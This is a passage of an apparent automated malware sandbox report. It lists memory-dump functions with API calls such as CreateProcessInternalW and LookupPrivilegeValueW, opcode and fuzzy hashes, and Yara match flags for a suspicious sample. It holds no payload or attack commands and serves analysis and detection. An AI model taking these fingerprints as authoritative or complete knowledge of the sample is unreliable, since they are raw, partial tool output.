                                                                                    • Source File: 0000000E.00000002.499640468.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                                                    • Associated: 0000000E.00000002.500141172.0000000004C8B000.00000040.00000001.sdmp Download File
                                                                                    • Associated: 0000000E.00000002.500150489.0000000004C8F000.00000040.00000001.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 919bab381a5ed81d1bdbec6ac04a2c42f0de134bd2c5b637e7fe907daea95503
                                                                                    • Instruction ID: 1699adfcc3d30ed5abada29abcc7dd27c6ada7d9138af331a68b65cef626e0ce
                                                                                    • Opcode Fuzzy Hash: 919bab381a5ed81d1bdbec6ac04a2c42f0de134bd2c5b637e7fe907daea95503
                                                                                    • Instruction Fuzzy Hash: FA90026221180142F200656B4C14B270009D7D0387F51C159A4145564CCA95D8716561
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04BD9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.499640468.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                                                    • Associated: 0000000E.00000002.500141172.0000000004C8B000.00000040.00000001.sdmp Download File
                                                                                    • Associated: 0000000E.00000002.500150489.0000000004C8F000.00000040.00000001.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: bee0b732c3a896a2a38d78dc4364dad60e64ce603e92da68f0afa7fa65a130ec
                                                                                    • Instruction ID: 0e552a7145c419a85bca768d11eff0b83c9ed23ff2a75eed0e983a8d3bdab579
                                                                                    • Opcode Fuzzy Hash: bee0b732c3a896a2a38d78dc4364dad60e64ce603e92da68f0afa7fa65a130ec
                                                                                    • Instruction Fuzzy Hash: 0D90026A21300102F180715B540862A0009D7D1286F91D459A4006568CCA95D8796361
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04BD9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.499640468.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                                                    • Associated: 0000000E.00000002.500141172.0000000004C8B000.00000040.00000001.sdmp Download File
                                                                                    • Associated: 0000000E.00000002.500150489.0000000004C8F000.00000040.00000001.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 03761938c8b3b005ce937adae894c5b8c7a919e11ea5e118e78b21b04ffdd4a3
                                                                                    • Instruction ID: 5c198aa1c49f7bea1ba2632645fbfaf4a933a4a1f9016c52b04842a9a32ae968
                                                                                    • Opcode Fuzzy Hash: 03761938c8b3b005ce937adae894c5b8c7a919e11ea5e118e78b21b04ffdd4a3
                                                                                    • Instruction Fuzzy Hash: 7C90027231114502F110615B84047260009D7D1285F51C455A4815568D87D5D8A17162
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04BD9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.499640468.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                                                    • Associated: 0000000E.00000002.500141172.0000000004C8B000.00000040.00000001.sdmp Download File
                                                                                    • Associated: 0000000E.00000002.500150489.0000000004C8F000.00000040.00000001.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: c233c7c8e80978e3cbbacf509e3c65d059285098e6ddced6f660590dc36773f8
                                                                                    • Instruction ID: 457baffb7426cb7407031a6da53c546a355b8b4bb652290655637b0a48afe421
                                                                                    • Opcode Fuzzy Hash: c233c7c8e80978e3cbbacf509e3c65d059285098e6ddced6f660590dc36773f8
                                                                                    • Instruction Fuzzy Hash: 6390027220100502F100659B54086660009D7E0385F51D055A9015565EC7E5D8A17171
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0073A168, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 52COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,0072F192,0072F192,?,00000000,?,?), ref: 0073A1F0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.496732172.0000000000720000.00000040.00000001.sdmp, Offset: 00720000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: LookupPrivilegeValue
                                                                                    • String ID: sP
                                                                                    • API String ID: 3899507212-1274495288
                                                                                    • Opcode ID: ca1da49df7325da0524d1ddea8fb46aebca7419bc2db128b058a1cb2c5c6feda
                                                                                    • Instruction ID: fed8f99c69f072c86b9dd98e291f575d0f0a6c66404663c935a5c425f254e28d
                                                                                    • Opcode Fuzzy Hash: ca1da49df7325da0524d1ddea8fb46aebca7419bc2db128b058a1cb2c5c6feda
                                                                                    • Instruction Fuzzy Hash: B50140B5200204BFDB14DF58CC85EDB77A9AF88350F118659FA5DA7242C634E8148BB1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0073A052, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00723AF8), ref: 0073A08D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.496732172.0000000000720000.00000040.00000001.sdmp, Offset: 00720000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FreeHeap
                                                                                    • String ID: .z`
                                                                                    • API String ID: 3298025750-1441809116
                                                                                    • Opcode ID: 77706aab972abb235ee41c2ef07e5dd6cb0f49badc79b318a2f9eb47a4dc8916
                                                                                    • Instruction ID: be3df80285660da8494b2d525ef130eeae9c71100af93f6cf3ebe2a9873ddf4e
                                                                                    • Opcode Fuzzy Hash: 77706aab972abb235ee41c2ef07e5dd6cb0f49badc79b318a2f9eb47a4dc8916
                                                                                    • Instruction Fuzzy Hash: 9DF0A0B1200100AFDB14EF28CC85EDB7BACEF48300F014158F80C9B242C230E915CAE0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0073A060, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00723AF8), ref: 0073A08D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.496732172.0000000000720000.00000040.00000001.sdmp, Offset: 00720000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FreeHeap
                                                                                    • String ID: .z`
                                                                                    • API String ID: 3298025750-1441809116
                                                                                    • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                    • Instruction ID: 54658d2b714d03212fbe6cb20745d31c1601f2455c41d77833368c1b114d1439
                                                                                    • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                    • Instruction Fuzzy Hash: E7E01AB1200204ABDB14DF59CC49EA777ACAF88750F014554B95857242C630F9108AB0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0073A020, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RtlAllocateHeap.NTDLL(007344F6,?,?,oLs,?,007344F6,?,?,?,?,?,00000000,00000000,?), ref: 0073A04D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.496732172.0000000000720000.00000040.00000001.sdmp, Offset: 00720000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap
                                                                                    • String ID: oLs
                                                                                    • API String ID: 1279760036-688551296
                                                                                    • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                    • Instruction ID: aade424d09fa07053fd6ef22fa96b1894a88bb95787723b4bcafe211fe6b8e28
                                                                                    • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                    • Instruction Fuzzy Hash: F1E012B1200208ABDB14EF99CC46EA777ACAF88650F128558BA586B242C630F9108AB0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00728374, Relevance: 3.2, APIs: 2, Instructions: 177COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.496732172.0000000000720000.00000040.00000001.sdmp, Offset: 00720000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1d7b8b2441f30e7af2b486e8daa75217623b6ba83a7f0001b977f4aacf5e5af3
                                                                                    • Instruction ID: f9692b613b24218fa5a27e9785e8f1e3845201b3c8755c9d7813bf32d73292b9
                                                                                    • Opcode Fuzzy Hash: 1d7b8b2441f30e7af2b486e8daa75217623b6ba83a7f0001b977f4aacf5e5af3
                                                                                    • Instruction Fuzzy Hash: 1651C3B1901219AFDB64DF64DC8AFEB77F8EB48700F10046DF95997242DB74A901CBA2
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 007282F0, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0072834A
                                                                                    • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0072836B
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.496732172.0000000000720000.00000040.00000001.sdmp, Offset: 00720000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: MessagePostThread
                                                                                    • String ID:
                                                                                    • API String ID: 1836367815-0
                                                                                    • Opcode ID: c7fc2a5f69c1d358cb08d19fc6b82389f9e8c0a6b9b865c62a2b7bfc84e48788
                                                                                    • Instruction ID: 793794262a74e5cde79b2699c5a326419ceccc06c7b4def1e5ef1152f9cc3ebe
                                                                                    • Opcode Fuzzy Hash: c7fc2a5f69c1d358cb08d19fc6b82389f9e8c0a6b9b865c62a2b7bfc84e48788
                                                                                    • Instruction Fuzzy Hash: 8A01D431A80228BBEB20A6989C07FFE776C6B00B50F050018FF04BA1C2E698790542F6
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 007282EA, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0072834A
                                                                                    • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0072836B
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.496732172.0000000000720000.00000040.00000001.sdmp, Offset: 00720000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: MessagePostThread
                                                                                    • String ID:
                                                                                    • API String ID: 1836367815-0
                                                                                    • Opcode ID: 74532523701995af950da2b68882e11f12f9c332bf9020e0c4f6222c4669454a
                                                                                    • Instruction ID: f06e46c33f03edbe26cdc1bf32303448bf56c350f6a11a2dccc33108d90018fd
                                                                                    • Opcode Fuzzy Hash: 74532523701995af950da2b68882e11f12f9c332bf9020e0c4f6222c4669454a
                                                                                    • Instruction Fuzzy Hash: 1301B131A80228BBEB24A6949C47FBE772CAB00B50F150059FF04BA1C2E699690647E6
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0072837B, Relevance: 1.7, APIs: 1, Instructions: 157threadwindowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0072836B
                                                                                      • Part of subcall function 007282F0: PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0072834A
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.496732172.0000000000720000.00000040.00000001.sdmp, Offset: 00720000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: MessagePostThread
                                                                                    • String ID:
                                                                                    • API String ID: 1836367815-0
                                                                                    • Opcode ID: a251bb187385b7c1231b67db5bdf795e12169c4306509703bc92ff27d7cdd28e
                                                                                    • Instruction ID: 47f94af36ee63080ba319b85fceb9551b34fa85a3fbcf3c2e7a83397c17111d3
                                                                                    • Opcode Fuzzy Hash: a251bb187385b7c1231b67db5bdf795e12169c4306509703bc92ff27d7cdd28e
                                                                                    • Instruction Fuzzy Hash: A551D4B19013199FDB64DF64D889BEB77F8EF48300F10046EF54997242DB74AA41CBA2
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0073A0D0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0073A124
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.496732172.0000000000720000.00000040.00000001.sdmp, Offset: 00720000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateInternalProcess
                                                                                    • String ID:
                                                                                    • API String ID: 2186235152-0
                                                                                    • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                    • Instruction ID: 8ab063ab0b2a5f0fe474c457256130bb36067d35fe52ddf0eff010d778689cfa
                                                                                    • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                    • Instruction Fuzzy Hash: 1901AFB2210108BFCB54DF89DC81EEB77ADAF8C754F158258BA4DA7241C630E851CBA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0073A1B1, Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,0072F192,0072F192,?,00000000,?,?), ref: 0073A1F0
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.496732172.0000000000720000.00000040.00000001.sdmp, Offset: 00720000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: LookupPrivilegeValue
                                                                                    • String ID:
                                                                                    • API String ID: 3899507212-0
                                                                                    • Opcode ID: c93c826677996585646db3d91abb345e7d942df0898df3dcc3c848753d917da9
                                                                                    • Instruction ID: d7196c37d190d2f3cc13ccae89535e01b2eeee96831340b7a53cc9efd90f8280
                                                                                    • Opcode Fuzzy Hash: c93c826677996585646db3d91abb345e7d942df0898df3dcc3c848753d917da9
                                                                                    • Instruction Fuzzy Hash: CDF08CB6200204ABDB10EF94CC86FEB7768EF48750F024494FA586BA02D632E815CBE1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0073A1C0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,0072F192,0072F192,?,00000000,?,?), ref: 0073A1F0
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.496732172.0000000000720000.00000040.00000001.sdmp, Offset: 00720000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: LookupPrivilegeValue
                                                                                    • String ID:
                                                                                    • API String ID: 3899507212-0
                                                                                    • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                    • Instruction ID: 414500b4605005f71760d138e48612d5729dcc3ebd84b81b031cf2dd005e8c80
                                                                                    • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                    • Instruction Fuzzy Hash: 8EE01AB1200208ABDB10DF49CC85EE737ADAF88650F018154BA4C67242C934F8108BF5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0072F687, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetErrorMode.KERNELBASE(00008003,?,00728CF4,?), ref: 0072F6BB
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.496732172.0000000000720000.00000040.00000001.sdmp, Offset: 00720000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorMode
                                                                                    • String ID:
                                                                                    • API String ID: 2340568224-0
                                                                                    • Opcode ID: 48526bae979c92434a849d4f0328ebb83bf623f6cf571189ddb77e7ad3f232e3
                                                                                    • Instruction ID: 97af51d32c3f8a1c7757e1c24b16e463d3c05eb7ee85552dcc700f79c43ba3e7
                                                                                    • Opcode Fuzzy Hash: 48526bae979c92434a849d4f0328ebb83bf623f6cf571189ddb77e7ad3f232e3
                                                                                    • Instruction Fuzzy Hash: 66D05E76B902052BF610AAA1ED07F663199AB51791F4A04B4FD49EF3C7DA68D4014260
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0072F690, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetErrorMode.KERNELBASE(00008003,?,00728CF4,?), ref: 0072F6BB
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.496732172.0000000000720000.00000040.00000001.sdmp, Offset: 00720000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorMode
                                                                                    • String ID:
                                                                                    • API String ID: 2340568224-0
                                                                                    • Opcode ID: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                                                                    • Instruction ID: 4adf9035a2131b0e292bef6bb704c77080f936c0e0618371cf8b04be691b5e9f
                                                                                    • Opcode Fuzzy Hash: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                                                                    • Instruction Fuzzy Hash: 90D0A7727903043BF610FAA5DC07F2632DCAB44B00F490074F949EB3C3D954F4004165
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04BD967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.499640468.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                                                    • Associated: 0000000E.00000002.500141172.0000000004C8B000.00000040.00000001.sdmp Download File
                                                                                    • Associated: 0000000E.00000002.500150489.0000000004C8F000.00000040.00000001.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 0231d820ddc28237a743f818f011beb33deccdde3d07fea159bea001e7a7fb2b
                                                                                    • Instruction ID: b98f92faf314b027df27eb1c7d3d46f289821d567a706284f0d8ecb20c213443
                                                                                    • Opcode Fuzzy Hash: 0231d820ddc28237a743f818f011beb33deccdde3d07fea159bea001e7a7fb2b
                                                                                    • Instruction Fuzzy Hash: FFB09BB29014C5C5F715D7714A087377904F7D0745F16C0D5D1020655A4778D491F6B5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Non-executed Functions

                                                                                    Function 04C2FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 53%
                                                                                    			E04C2FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E04BDCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04C25720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04C25720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                                    0x04c2fdda
                                                                                    0x04c2fde2
                                                                                    0x04c2fde5
                                                                                    0x04c2fdec
                                                                                    0x04c2fdfa
                                                                                    0x04c2fdff
                                                                                    0x04c2fe0a
                                                                                    0x04c2fe0f
                                                                                    0x04c2fe17
                                                                                    0x04c2fe1e
                                                                                    0x04c2fe19
                                                                                    0x04c2fe19
                                                                                    0x04c2fe19
                                                                                    0x04c2fe20
                                                                                    0x04c2fe21
                                                                                    0x04c2fe22
                                                                                    0x04c2fe25
                                                                                    0x04c2fe40

                                                                                    APIs
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04C2FDFA
                                                                                    Strings
                                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04C2FE01
                                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04C2FE2B
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000E.00000002.499640468.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                                                    • Associated: 0000000E.00000002.500141172.0000000004C8B000.00000040.00000001.sdmp Download File
                                                                                    • Associated: 0000000E.00000002.500150489.0000000004C8F000.00000040.00000001.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                    • API String ID: 885266447-3903918235
                                                                                    • Opcode ID: 87767164ef511f9fb987b05dfaca056f56eba3f3c4bd6b43d82aa3a8c4866816
                                                                                    • Instruction ID: 50fa89f3c69d00c2c6950450dce0eaed28d2620b3bcb1fefd2370c6a26b9a627
                                                                                    • Opcode Fuzzy Hash: 87767164ef511f9fb987b05dfaca056f56eba3f3c4bd6b43d82aa3a8c4866816
                                                                                    • Instruction Fuzzy Hash: FEF0F672240211BFE6252A45DD02F33BF6BEB44B30F140358F628561E1EAA2FC20E6F4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%